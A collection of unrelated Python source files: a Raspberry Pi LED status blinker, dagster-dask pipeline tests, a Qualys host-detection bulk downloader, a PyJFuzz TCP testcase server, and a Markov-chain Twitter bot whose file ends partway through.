# ===== pixels_aiy_v1.py =====
import time
import queue
import threading
import RPi.GPIO as GPIO
_GPIO_PIN = 25
class Pixels:
def __init__(self):
self.is_light_on = 1
self.count_down = 0
self.light_on_count = 0
self.light_off_count = 0
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(_GPIO_PIN, GPIO.OUT)
self.queue = queue.Queue()
self.off()
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
self.thread.start()
def wakeup(self, direction=0):
self.queue.put((1, 1))
def listen(self):
self.queue.put((5, 5))
def think(self):
self.queue.put((3, 3))
def speak(self):
self.queue.put((10, 0))
def off(self):
self.queue.put((0, 10))
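# Each queued pair is (light_on_count, light_off_count), measured in
# 0.1 s ticks: wakeup blinks fast, listen and think blink slower,
# speak effectively holds the LED on, and off holds it off.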
def _set_light_on(self, on):
pos = GPIO.HIGH if on else GPIO.LOW
GPIO.output(_GPIO_PIN, pos)
def _run(self):
while True:
while not self.queue.empty():
(self.light_on_count, self.light_off_count) = self.queue.get()
self.is_light_on = 0
self.count_down = 0
while self.queue.empty():
if self.count_down == 0:
self.is_light_on = not self.is_light_on
if self.is_light_on:
self.count_down = self.light_on_count
else:
self.count_down = self.light_off_count
if self.count_down == 0:
continue
self._set_light_on(self.is_light_on)
time.sleep(0.1)
self.count_down -= 1
pixels = Pixels()
if __name__ == '__main__':
while True:
try:
pixels.wakeup()
time.sleep(3)
pixels.listen()
time.sleep(3)
pixels.think()
time.sleep(3)
pixels.speak()
time.sleep(3)
pixels.off()
time.sleep(3)
except KeyboardInterrupt:
break
pixels.off()
time.sleep(1)
# ===== test_execute.py =====
import asyncio
import tempfile
import time
from threading import Thread
import dagster_pandas as dagster_pd
import pytest
from dagster import (
DagsterUnmetExecutorRequirementsError,
InputDefinition,
ModeDefinition,
execute_pipeline,
execute_pipeline_iterator,
file_relative_path,
pipeline,
reconstructable,
solid,
)
from dagster.core.definitions.executor import default_executors
from dagster.core.definitions.reconstructable import ReconstructablePipeline
from dagster.core.events import DagsterEventType
from dagster.core.test_utils import instance_for_test, nesting_composite_pipeline
from dagster.utils import send_interrupt
from dagster_dask import DataFrame, dask_executor
from dask.distributed import Scheduler, Worker
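# The tests below share one pattern: wrap the pipeline in a reconstructable
# so it can be pickled and shipped to dask workers, execute it against a
# local (or existing) dask cluster, and assert on the solid outputs.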
@solid
def simple(_):
return 1
@pipeline(mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])])
def dask_engine_pipeline():
simple()
def test_execute_on_dask_local():
with tempfile.TemporaryDirectory() as tempdir:
with instance_for_test(temp_dir=tempdir) as instance:
result = execute_pipeline(
reconstructable(dask_engine_pipeline),
run_config={
"intermediate_storage": {"filesystem": {"config": {"base_dir": tempdir}}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
},
instance=instance,
)
assert result.result_for_solid("simple").output_value() == 1
def dask_composite_pipeline():
return nesting_composite_pipeline(
6, 2, mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])]
)
def test_composite_execute():
with instance_for_test() as instance:
result = execute_pipeline(
reconstructable(dask_composite_pipeline),
run_config={
"intermediate_storage": {"filesystem": {}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
},
instance=instance,
)
assert result.success
@solid(input_defs=[InputDefinition("df", dagster_pd.DataFrame)])
def pandas_solid(_, df): # pylint: disable=unused-argument
pass
@pipeline(mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])])
def pandas_pipeline():
pandas_solid()
def test_pandas_dask():
run_config = {
"solids": {
"pandas_solid": {
"inputs": {"df": {"csv": {"path": file_relative_path(__file__, "ex.csv")}}}
}
}
}
with instance_for_test() as instance:
result = execute_pipeline(
ReconstructablePipeline.for_file(__file__, pandas_pipeline.name),
run_config={
"intermediate_storage": {"filesystem": {}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
**run_config,
},
instance=instance,
)
assert result.success
@solid(input_defs=[InputDefinition("df", DataFrame)])
def dask_solid(_, df): # pylint: disable=unused-argument
pass
@pipeline(mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])])
def dask_pipeline():
dask_solid()
def test_dask():
run_config = {
"solids": {
"dask_solid": {
"inputs": {
"df": {"read": {"csv": {"path": file_relative_path(__file__, "ex*.csv")}}}
}
}
}
}
with instance_for_test() as instance:
result = execute_pipeline(
ReconstructablePipeline.for_file(__file__, dask_pipeline.name),
run_config={
"intermediate_storage": {"filesystem": {}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
**run_config,
},
instance=instance,
)
assert result.success
def test_execute_on_dask_local_with_intermediate_storage():
with tempfile.TemporaryDirectory() as tempdir:
with instance_for_test(temp_dir=tempdir) as instance:
result = execute_pipeline(
reconstructable(dask_engine_pipeline),
run_config={
"intermediate_storage": {"filesystem": {"config": {"base_dir": tempdir}}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
},
instance=instance,
)
assert result.result_for_solid("simple").output_value() == 1
def test_execute_on_dask_local_with_default_storage():
with pytest.raises(DagsterUnmetExecutorRequirementsError):
with instance_for_test() as instance:
result = execute_pipeline(
reconstructable(dask_engine_pipeline),
run_config={
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
},
instance=instance,
)
assert result.result_for_solid("simple").output_value() == 1
@solid(input_defs=[InputDefinition("df", DataFrame)])
def sleepy_dask_solid(_, df): # pylint: disable=unused-argument
start_time = time.time()
while True:
time.sleep(0.1)
if time.time() - start_time > 120:
raise Exception("Timed out")
@pipeline(mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])])
def sleepy_dask_pipeline():
sleepy_dask_solid()
def test_dask_terminate():
run_config = {
"solids": {
"sleepy_dask_solid": {
"inputs": {
"df": {"read": {"csv": {"path": file_relative_path(__file__, "ex*.csv")}}}
}
}
}
}
interrupt_thread = None
result_types = []
with instance_for_test() as instance:
for result in execute_pipeline_iterator(
pipeline=ReconstructablePipeline.for_file(__file__, sleepy_dask_pipeline.name),
run_config=run_config,
instance=instance,
):
# Interrupt once the first step starts
if result.event_type == DagsterEventType.STEP_START and not interrupt_thread:
interrupt_thread = Thread(target=send_interrupt, args=())
interrupt_thread.start()
if result.event_type == DagsterEventType.STEP_FAILURE:
assert (
"DagsterExecutionInterruptedError" in result.event_specific_data.error.message
)
result_types.append(result.event_type)
interrupt_thread.join()
assert DagsterEventType.STEP_FAILURE in result_types
assert DagsterEventType.PIPELINE_FAILURE in result_types
def test_existing_scheduler():
def _execute(scheduler_address, instance):
return execute_pipeline(
reconstructable(dask_engine_pipeline),
run_config={
"intermediate_storage": {"filesystem": {}},
"execution": {
"dask": {"config": {"cluster": {"existing": {"address": scheduler_address}}}}
},
},
instance=instance,
)
async def _run_test():
with instance_for_test() as instance:
async with Scheduler() as scheduler:
async with Worker(scheduler.address) as _:
result = await asyncio.get_event_loop().run_in_executor(
None, _execute, scheduler.address, instance
)
assert result.success
assert result.result_for_solid("simple").output_value() == 1
asyncio.get_event_loop().run_until_complete(_run_test())
# ===== qualysguard_host_list_detection.py =====
from __future__ import print_function
__author__ = 'Parag Baxi'
# System modules
import argparse
import ast
import ConfigParser
import datetime
import logging
import os
import sys
import time
from Queue import Queue
from threading import Thread
# Local modules
import qualysapi
from lxml import objectify, etree
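# Overall flow: the main thread discovers host IDs in chunks and queues them;
# each worker thread pops a chunk of IDs from the queue and downloads the
# host list detection data for those IDs.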
def download_hosts(i, q):
"""This is the worker thread function.
It processes items in the queue one after
another. These daemon threads go into an
infinite loop, and only exit when
the main thread ends.
"""
global c_args, datetime_format, start_time_hosts_detection
# Have thread number start at 1 for human display.
thread_number = i + 1
# Download assigned hosts in this thread.
while True:
logger.debug('Thread %s: Looking for the next chunk of host ids' % (thread_number))
ids = q.get()
# Chunk received. Start time.
if not start_time_hosts_detection:
start_time_hosts_detection = time.time()
# Find start & end host ids for logging.
if not ',' in ids:
# Only one host_id or one range, no comma found.
ids_range = ids
else:
try:
thread_start = ids[:ids.index(',')]
thread_end = ids[ids.rindex(',')+1:]
ids_range = '%s-%s' % (thread_start, thread_end)
except ValueError, e:
# Only one host_id, no comma found.
ids_range = ids
logger.info('Thread %s: Downloading new hosts.' % (thread_number))
logger.debug('Thread %s: Downloading new hosts: %s' % (thread_number, ids))
# Set parameters.
params = {'action': 'list',
'ids': ids,
'output_format': c_args.format,}
# Suppress duplicate data for CSV format.
if 'CSV' in params['output_format']:
params.update({'suppress_duplicated_data_from_csv': '1'})
# Add user parameter options, if applicable.
if c_args.parameters:
user_params = ast.literal_eval(c_args.parameters)
params.update(user_params)
# Download host list detection chunk.
response = qgc.request('/api/2.0/fo/asset/host/vm/detection/',
params)
q.task_done()
# Don't write to file if benchmarking.
if not c_args.benchmark:
file_extension = 'csv'
if c_args.format == 'XML':
file_extension = 'xml'
filename = '%s/%s-host_ids-%s.%s' % (c_args.output_directory, datetime_format, ids_range, file_extension)
logger.debug('Writing hosts file: %s' % filename)
with open(filename, 'w') as host_file:
print(response, file = host_file)
logger.debug('Thread %s: Finished downloading.: %s' % (thread_number, ids))
def save_config():
"""
:return: Completed save.
"""
global host_id_start
# Save start host id to file.
cfgfile = open("config.ini",'w')
try:
Config.add_section('Host ID')
except ConfigParser.DuplicateSectionError, e:
# File already exists.
pass
Config.set('Host ID','start',host_id_start)
Config.write(cfgfile)
cfgfile.close()
return True
def find_start_host_id(id_start):
"""
:param id_start: Host ID to start querying.
:return: Start Host ID.
"""
global qgc
tree = qgc.request('/api/2.0/fo/asset/host/',
{'action': 'list',
'id_min': str(id_start),
'details': 'None',
'truncation_limit': '1',})
# Objectify.
host_list_output = objectify.fromstring(tree)
# Find start ID.
host_id_start = id_start = host_list_output.RESPONSE.ID_SET.ID.text
return host_id_start
def ids_in_id_list(tree):
"""Return set of extracted IPs from IP list XML.
"""
ids = []
# Grab all IDs and ID ranges.
id_list = tree.xpath('//ID_SET/descendant::*/text()')
for i in id_list:
logger.debug('ID: %s' % i)
if '-' in i:
id_start = i[:i.find('-')]
id_end = i[i.find('-')+1:]
ids += range(int(id_start),int(id_end)+1)
else:
ids += [int(i)]
return ids
def chunk_to_parameter(chunk):
"""
:param chunk: List of numbers.
:return: String of numbers, comma delimited, no spaces.
"""
numbers = ''
for number in chunk:
numbers += '%s,' % number
# Remove last comma.
numbers = numbers[:-1]
return numbers
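# Note: chunk_to_parameter(chunk) is equivalent to
# ','.join(str(n) for n in chunk).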
def add_work_and_find_end_host_id(id_start, num_hosts_per_call):
"""
:param id_start: Host ID to start querying.
:param num_hosts_per_call: Number of hosts to query per call.
:return: Last host ID.
"""
global hosts_queue, logger, num_hosts
chunk = []
while True:
id_start += 1
logger.debug('Calling host API to identify host ids.')
tree = qgc.request('/api/2.0/fo/asset/host/',
{'action': 'list',
'id_min': str(id_start),
'details': 'None',
'truncation_limit': num_hosts_per_call,})
# Extract host ids.
ids = ids_in_id_list(etree.fromstring(tree))
# Add length to total number of hosts.
num_hosts += len(ids)
logger.info('Found %s id(s), will now queue.' % str(len(ids)))
logger.debug('ids found: %s' % str(ids))
# Are there any more hosts?
if not ids:
# No more new hosts.
logger.info('No more new hosts.')
# Is the current chunk incomplete?
if chunk:
# Send it to work queue.
# Add work to the queue.
logger.debug('Queuing remaining id(s): %s' % str(chunk))
hosts_queue.put(chunk_to_parameter(chunk))
break
# For next round, find last host id, set to new start host id.
id_start = ids[len(ids)-1]
# Add hosts to work queue by popping until chunks are full.
# Popping removes from end, so reverse to maintain order.
ids.reverse()
# Work until ids is empty.
while ids:
# Add to chunk.
chunk.append(ids.pop())
logger.debug('id added: %s' % str(chunk[-1]))
# Is the chunk full?
if len(chunk) == c_args.hosts_to_download_per_call:
# Add work to the queue.
logger.debug('Queuing: %s' % str(chunk))
hosts_queue.put(chunk_to_parameter(chunk))
# Reset chunk.
chunk = []
# Return last host, which was saved in id_start from while loop.
logger.debug('Done processing up to host id: %s' % str(id_start))
return id_start
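# Example: with hosts_to_download_per_call=3 and discovered ids [1, 2, 3, 4, 5],
# the queue receives the parameter strings '1,2,3' and then '4,5'.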
#
# Begin
#
# Set timers.
start_time_hosts_detection = False
start_time = time.time()
# Declare the command line flags/options we want to allow.
parser = argparse.ArgumentParser(
description='Download hosts concurrently and efficiently via host list detection API.')
# parser.add_argument('-a', '--override_all_apps',
# help='Generate report for all webapps. Automatically selected for first run.')
# Do not store files.
parser.add_argument('--benchmark',
action = 'store_true',
help = argparse.SUPPRESS)
parser.add_argument('--config',
help = 'Configuration for Qualys connector.')
parser.add_argument('-d', '--hosts_to_download_per_call',
default=1000,
help='Override default number of hosts (1000) to download per call for host vulnerability data.')
parser.add_argument('-f', '--format',
default='CSV_NO_METADATA',
help='Set host list detection output format. (Default = CSV_NO_METADATA)')
parser.add_argument('-i','--host_id_discovery_truncation_limit',
default=5000,
help='Override default truncation limit (5000) for host ID discovery.')
parser.add_argument('-o', '--output_directory',
default='data',
help='Set directory for data output. (Default = data)')
parser.add_argument('-p', '--parameters',
help='Set host list detection parameters (Default: {\'suppress_duplicated_data_from_csv\': \'1\'})\n(Example: \"{\'include_search_list_titles\': \'SSL+certificate\', \'active_kernels_only\': \'1\'}\")')
parser.add_argument('-t', '--threads',
default=2,
help='Number of concurrent threads to call the host list detection API with. (Default = 2)')
parser.add_argument('-v', '--verbose',
action = 'store_true',
help='Outputs additional information to log.')
# Parse arguments.
c_args = parser.parse_args()
c_args.hosts_to_download_per_call = int(c_args.hosts_to_download_per_call)
# Create log and data directories.
PATH_LOG = 'log'
if not os.path.exists(PATH_LOG):
os.makedirs(PATH_LOG)
if not os.path.exists(c_args.output_directory):
os.makedirs(c_args.output_directory)
# Set log options.
datetime_format = datetime.datetime.now().strftime('%Y-%m-%d.%H-%M-%S')
LOG_FILENAME = '%s/%s-%s.log' % (PATH_LOG,
__file__,
datetime_format)
# Make a global logging object.
logger = logging.getLogger()
if c_args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logging.getLogger('qualysapi').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.ERROR)
# This handler writes everything to a file.
logger_file = logging.FileHandler(LOG_FILENAME)
logger_file.setFormatter(logging.Formatter("%(asctime)s %(name)-12s %(levelname)s %(funcName)s %(lineno)d %(message)s"))
# This handler prints to screen.
logger_console = logging.StreamHandler(sys.stdout)
if c_args.verbose:
logger_file.setLevel(logging.DEBUG)
logger_console.setLevel(logging.DEBUG)
else:
logger_file.setLevel(logging.INFO)
logger_console.setLevel(logging.ERROR)
logger.addHandler(logger_file)
logger.addHandler(logger_console)
# Configure Qualys API connector.
if c_args.config:
qgc = qualysapi.connect(c_args.config)
else:
qgc = qualysapi.connect()
# Read config file, if available.
Config = ConfigParser.ConfigParser()
Config.read('config.ini')
try:
host_id_start = Config.getint('Host ID', 'start')
logger.debug('Read host_id_start from config file: %s' % str(host_id_start))
except ConfigParser.NoSectionError, e:
# Discover start host_id, minimum is 1.
host_id_start = 1
# Confirm start id. May be pushed back due to purging.
host_id_start = int(find_start_host_id(host_id_start))
logger.debug('New host_id_start: %s' % host_id_start)
# Keep track of number of hosts.
num_hosts = 0
# Set up multi-threading.
# Number of threads.
threads = int(c_args.threads)
# Set up some global variables
hosts_queue = Queue()
# Set up worker threads to fetch the host detection data
for i in range(threads):
worker = Thread(target=download_hosts, args=(i, hosts_queue,))
worker.setDaemon(True)
worker.start()
# Find hosts and queue work.
host_id_end = add_work_and_find_end_host_id(host_id_start, c_args.host_id_discovery_truncation_limit)
logger.debug('host_id_end: %s' % str(host_id_end))
elapsed_time_host_ids = time.time() - start_time
# Save configuration
save_config()
# Now wait for the queue to be empty, indicating that we have
# processed all of the downloads.
logger.info('*** All hosts queued. Waiting for downloads to complete.')
hosts_queue.join()
logger.info('*** Done')
elapsed_time = time.time() - start_time
elapsed_time_hosts_detection = time.time() - start_time_hosts_detection
logger.info('Number of threads: %s' % str(c_args.threads))
logger.info('Number of hosts downloaded per call: %s' % str(c_args.hosts_to_download_per_call))
logger.info('Number of hosts downloaded: %s' % num_hosts)
logger.info('Seconds elapsed to download all host ids: %s' % elapsed_time_host_ids)
logger.info('Seconds elapsed to download all host detection data: %s' % elapsed_time_hosts_detection)
logger.info('Seconds elapsed total: %s' % elapsed_time)

# ===== pjf_testcase_server.py =====
"""
The MIT License (MIT)
Copyright (c) 2016 Daniele Linguaglossa <d.linguaglossa@mseclab.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NON INFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
import time
import threading
import struct
import socket
from pjf_logger import PJFLogger
from errors import PJFMissingArgument, PJFBaseException, PJFSocketError
class PJFTestcaseServer(object):
def __init__(self, configuration):
self.logger = self.init_logger()
if ["ports"] not in configuration:
raise PJFMissingArgument("PJFTestcaseServer needs \"ports\" argument inside config object")
self.config = configuration
self.testcase = []
self.starting = True
self.number_of_testcase = 0
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock.bind(('', self.config.ports["servers"]["TCASE_PORT"]))
self.logger.debug("[{0}] - PJFTestcaseServer successfully initialized".format(time.strftime("%H:%M:%S")))
def handle(self, sock):
"""
Handle the actual TCP connection
"""
try:
size = struct.unpack("<I", sock.recv(4))[0]
data = ""
while len(data) < size:
data += sock.recv(size - len(data))
if len(self.testcase) >= 100:
del self.testcase
self.testcase = list()
self.testcase.append(data)
sock.close()
except socket.error as e:
raise PJFSocketError(e.message)
except Exception as e:
raise PJFBaseException(e.message)
def _shutdown(self, *args):
"""
Kill TCP server
"""
self.starting = False
try:
self._sock.close()
except socket.error:
pass
self.logger.debug("[{0}] - PJFTestcaseServer successfully completed".format(time.strftime("%H:%M:%S")))
def increment_testcase(self):
"""
Increment the testcase number
"""
self.number_of_testcase += 1
def got_testcase(self):
"""
Check if a testcase was received
"""
return len(self.testcase) > self.number_of_testcase
def listen(self):
"""
Listen on host:port
"""
self._sock.listen(1)
while self.starting:
try:
sock, ip = self._sock.accept()
threading.Thread(target=self.handle, args=(sock,)).start()
except socket.error:
pass
def start(self):
"""
Start TCP Server
"""
self.starting = True
threading.Thread(target=self.listen).start()
def init_logger(self):
"""
Init the default logger
"""
return PJFLogger.init_logger()
@staticmethod
def send_testcase(json, ip, port):
"""
Send a raw testcase
"""
try:
json = struct.pack("<I", len(json)) + json
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send(json)
s.shutdown(socket.SHUT_RDWR)
s.close()
return True
except socket.error:
return False
except socket.error as e:
raise PJFSocketError(e.message)
except Exception as e:
raise PJFBaseException(e.message)
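# Minimal usage sketch (hedged: assumes a configuration object that exposes
# ports["servers"]["TCASE_PORT"], as required by __init__):
#
#   server = PJFTestcaseServer(config)
#   server.start()
#   PJFTestcaseServer.send_testcase('{"a": 1}', '127.0.0.1',
#                                   config.ports["servers"]["TCASE_PORT"])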
# ===== markovbot.py =====
# -*- coding: utf-8 -*-
#
# For installation instructions and more information, please refer to:
# http://www.pygaze.org/2016/03/tutorial-creating-a-twitterbot/
# (This includes instructions to install the Twitter library used here)
#
# This file is part of markovbot, created by Edwin Dalmaijer
# GitHub: https://github.com/esdalmaijer/markovbot
#
# Markovbot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Markovbot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with markovbot. If not, see <http://www.gnu.org/licenses/>.
# native imports
import os
import sys
import re
import copy
import time
import nltk
import html
import pickle
import random
import markovify
from markovify.chain import BEGIN
from html.parser import HTMLParser
from threading import Thread, Lock
from multiprocessing import Queue
# external imports
# Twitter package: https://pypi.python.org/pypi/twitter
# Homepage of Twitter package: http://mike.verdone.ca/twitter/
try:
import twitter
IMPTWITTER = True
except:
print(u"WARNING from Markovbot: Could not load the 'twitter' library, so Twitter functionality is not available.")
IMPTWITTER = False
class MarkovBot():
"""Class to generate text with a Markov chain, with support to read and
post updates to Twitter accounts.
"""
def __init__(self):
"""Initialises the bot.
"""
# # # # #
# DATA
# Create an empty dict for the data
self.data = {u'default': {}}
self.bot = None
# # # # #
# TWITTER
# Starting value for the Twitter and TwitterStream instances
self._t = None
self._ts = None
# Create locks for these instances, so they won't be accessed at the
# same time by different threads.
self._tlock = Lock()
self._tslock = Lock()
# Create a Boolean that indicates whether the bot is logged in, and
# a placeholder for the credentials of the user that is logged in
self._loggedin = False
self._credentials = None
# Create variables to keep track of tweets that should not be
# replied to. The self._maxconvdepth value determines the maximum
# conversation length that this bot is allowed to participate in.
# Keep the number low to prevent the bot from being spammy.
self._nonotweets = []
self._maxconvdepth = None
# Placeholders for debugging values of the last incoming and
# outgoing tweets
self._lasttweetin = None
self._lasttweetout = None
# Prepare the autoreplying thread
self._autoreplying = False
self._autoreply_database = None
self._targetstring = None
self._keywords = None
self._tweetprefix = None
self._tweetsuffix = None
self._mindelay = 0.0
if IMPTWITTER:
self._autoreplythreadlives = True
self._autoreplythread = Thread(target=self._autoreply)
self._autoreplythread.daemon = True
self._autoreplythread.name = u'autoreplier'
else:
self._autoreplythreadlives = False
# Prepare the tweeting thread
self._tweetingdatabase = None
self._autotweeting = False
self._tweetinginterval = None
self._tweetingjitter = None
self._tweetingkeywords = None
self._tweetingprefix = None
self._tweetingsuffix = None
if IMPTWITTER:
self._tweetingthreadlives = True
self._tweetingthread = Thread(target=self._autotweet)
self._tweetingthread.daemon = True
self._tweetingthread.name = u'autotweeter'
else:
self._tweetingthreadlives = False
# Prepare the self-examination Thread (periodically checks whether
# all Threads are still alive, and revives any dead ones.)
self._selfexaminationthreadlives = True
self._selfexaminationthread = Thread(target=self._self_examination)
self._selfexaminationthread.daemon = True
self._selfexaminationthread.name = u'selfexaminer'
# Start all Threads.
if IMPTWITTER:
self._autoreplythread.start()
self._tweetingthread.start()
self._selfexaminationthread.start()
def clear_data(self, database=None):
"""Clears the current internal data. NOTE: This does not remove
existing pickled data!
Keyword Arguments
database - A string that indicates the name of the
specific database that you want to clear,
or None to clear all data. (default = None)
"""
# Overwrite data
if database == None:
self.data = {'default': {}}
else:
try:
self.data.pop(database)
except KeyError:
self._error(u'clear_data',
u"There was no database named '%s'" % (database))
'''def generate_text(self, maxlength, seedword=None, database=u'default',
verbose=False, maxtries=100):
"""Generates random text based on the provided database.
Arguments
maxlength - An integer value indicating the amount of words
that can maximally be produced. The actual
number is determined by where interpunction
occurred. Text will be cut off at a comma,
full stop, and exclamation or question marks.
Keyword Arguments
seedword - A string that indicates what word should be in
the sentence. If None is passed, or if the word
is not in the database, a random word will be
chosen. This value can also be a list of words,
in which case the list will be processed
one-by-one until a word is found that is in the
database.
database - A string that indicates the name of the
specific database that you want to use to
generate the text, or u'default' to use the
default database. (default = 'default')
verbose - Boolean that indicates whether this function
should bother you with excessive and unnecessary
messages whenever it can't immediately produce
a text (it will still raise an Exception after
maxtries attempts).
maxtries - Integer indicating how many attempts the function
is allowed to construct some text (sometimes
this fails, and I couldn't be bothered to do
elaborate debugging)
Returns
sentence - A string that starts with a capital, and ends
with a full stop.
"""
# Raise an Exception when no data exists
if self.data[database] == {}:
self._error(u'generate_text',
u"No data is available yet in database '%s'. Did you read any data yet?" % (database))
# Sometimes, for mysterious reasons, a word duo does not appear as a
# key in the database. This results in a KeyError, which is highly
# annoying. Because I couldn't quite find the bug that causes this
# after a whopping five minutes of looking for it, I decided to go
# with the lazy approach of using a try and except statements. Sorry.
error = True
attempts = 0
# Make a single keyword into a list of them
if type(seedword) in [str]:
seedword = [seedword]
# Run until a proper sentence is produced
while error:
try:
# Get all word duos in the database
keys = self.data[database]
key_list=list(keys)
# print(key_list)
# print(keys)
# Shuffle the word duos, so that not the same is
# found every time
random.shuffle(list(keys))
# Choose a random seed to fall back on when seedword does
# not occur in the keys, or if seedword==None
seed = random.randint(0, len(list(keys)))
w1, w2 = key_list[seed]
# Try to find a word duo that contains the seed word
if seedword != None:
# Loop through all potential seed words
while len(seedword) > 0:
# Loop through all keys (these are (w1,w2)
# tuples of words that occurred together in the
# text used to generate the database
for i in range(len(keys)):
# If the seedword is only one word, check
# if it is part of the key (a word duo)
# If the seedword is a combination of words,
# check if they are the same as the key
if seedword[0] in key_list[i] or \
(tuple(seedword[0].split(u' ')) == \
key_list[i]):
# Choose the words
w1, w2 = key_list[i]
# Get rid of the seedwords
seedword = []
break
# Get rid of the first keyword, if it was not
# found in the word duos
if len(seedword) > 0:
seedword.pop(0)
# Empty list to contain the generated words
words = []
# Loop to get as many words as requested
for i in range(maxlength):
# Add the current first word
words.append(w1)
# Generate a new first and second word, based on the
# database. Each key is a (w1, w2) tuple that points to
# a list of words that can follow the (w1, w2) word
# combination in the studied text. A random word from
# this list is selected. Note: words can occur more
# than once in this list, thus more likely word
# combinations are more likely to be selected here.
w1, w2 = w2, random.choice(self.data[database][(w1, w2)])
# Add the final word to the generated words
words.append(w2)
# Capitalise the first word, capitalise all single 'i's,
# and attempt to capitalise letters that occur after a
# full stop.
for i in range(0, len(words)):
if (i == 0) or (u'.' in words[i-1]) or \
(words[i] == u'i'):
words[i] = words[i].capitalize()
# Find the last acceptable interpunction by looping
# through all generated words, last-to-first, and
# checking which is the last word that contains
# relevant interpunction.
ei = 0
for i in range(len(words)-1, 0, -1):
# Check whether the current word ends with
# relevant interpunction. If it does, use the
# current as the last word. If the interpunction
# is not appropriate for ending a sentence with,
# change it to a full stop.
if words[i][-1] in [u'.', u'!', u'?']:
ei = i+1
elif words[i][-1] in [u',', u';', u':']:
ei = i+1
words[i][-1] = u'.'
# Break if we found a word with interpunction.
if ei > 0:
break
# Cut back to the last word with stop-able interpunction
words = words[:ei]
# Combine the words into one big sentence
sentence = u' '.join(words)
if sentence != u'':
error = False
# If the above code fails
except:
# Count one more failed attempt
attempts += 1
# Report the error to the console
if verbose:
self._message(u'generate_text', u"Ran into a bit of an error while generating text. Will make %d more attempts" % (
maxtries-attempts))
# If too many attempts were made, raise an error to stop
# making any further attempts
if attempts >= maxtries:
self._error(u'generate_text',
u"Made %d attempts to generate text, but all failed. " % (attempts))
return sentence
'''
def generate_text(self, maxlength, seedword=None, database=u'default',
verbose=False, maxtries=100):
"""Generates random text based on the provided database.
Arguments
maxlength - An integer value indicating the amount of words
that can maximally be produced. The actual
number is determined by where interpunction
occurred. Text will be cut off at a comma,
full stop, and exclamation or question marks.
Keyword Arguments
seedword - A string that indicates what word should be in
the sentence. If None is passed, or if the word
is not in the database, a random word will be
chosen. This value can also be a list of words,
in which case the list will be processed
one-by-one until a word is found that is in the
database.
database - A string that indicates the name of the
specific database that you want to use to
generate the text, or u'default' to use the
default database. (default = 'default')
verbose - Boolean that indicates whether this function
should bother you with excessive and unnecessary
messages whenever it can't immediately produce
a text (it will still raise an Exception after
maxtries attempts).
maxtries - Integer indicating how many attempts the function
is allowed to construct some text (sometimes
this fails, and I couldn't be bothered to do
elaborate debugging)
Returns
sentence - A string that starts with a capital, and ends
with a full stop.
"""
comment = ""
bot = self.bot
while True:
# For each sentence, check how close to the average comment length
# we are, then use the remaining percentage as the chance of
# adding another sentence. For example, if we're at 70% of the
# average comment length, there will be a 30% chance of adding
# another sentence. We're also adding a fixed 10% on top of that
# just to increase the length a little, and have some chance of
# continuing once we're past the average.
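# (The assumed average comment length is hard-coded below as 25 characters.)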
portion_done = len(comment) / float(25)
continue_chance = 1.0 - portion_done
continue_chance = max(0, continue_chance)
continue_chance += 0.1
if random.random() > continue_chance:
break
new_sentence = None
if seedword != None:
# Make a single keyword into a list of them.
if type(seedword) in [str]:
seedword = [seedword]
# Try each candidate seed in turn; discard seeds that yield nothing
# so this loop cannot spin forever.
while len(seedword) > 0:
new_sentence = bot.make_short_sentence(maxlength, beginning=seedword[0], tries=10000,
max_overlap_total=10,
max_overlap_ratio=0.5)
if new_sentence:
break
seedword.pop(0)
# Fall back on an unseeded sentence if no seed produced one.
if not new_sentence:
new_sentence = bot.make_short_sentence(maxlength, tries=10000,
max_overlap_total=10,
max_overlap_ratio=0.5)
if not new_sentence:
# The model produced nothing at all; stop extending the comment.
break
comment += " " + new_sentence
comment = comment.strip()
return comment
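# Example (hedged; assumes read() has already been called so that self.bot
# holds a markovify model):
#   mb = MarkovBot()
#   mb.read('corpus.txt')
#   text = mb.generate_text(140)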
def pickle_data(self, filename):
"""Stores a database dict in a pickle file
Arguments
filepath - A string that indicates the path of the new
pickle file
"""
# Store the database in a pickle file
with open(filename, u'wb') as f:
pickle.dump(self.data, f)
def read(self, filename, database=u'default', overwrite=False):
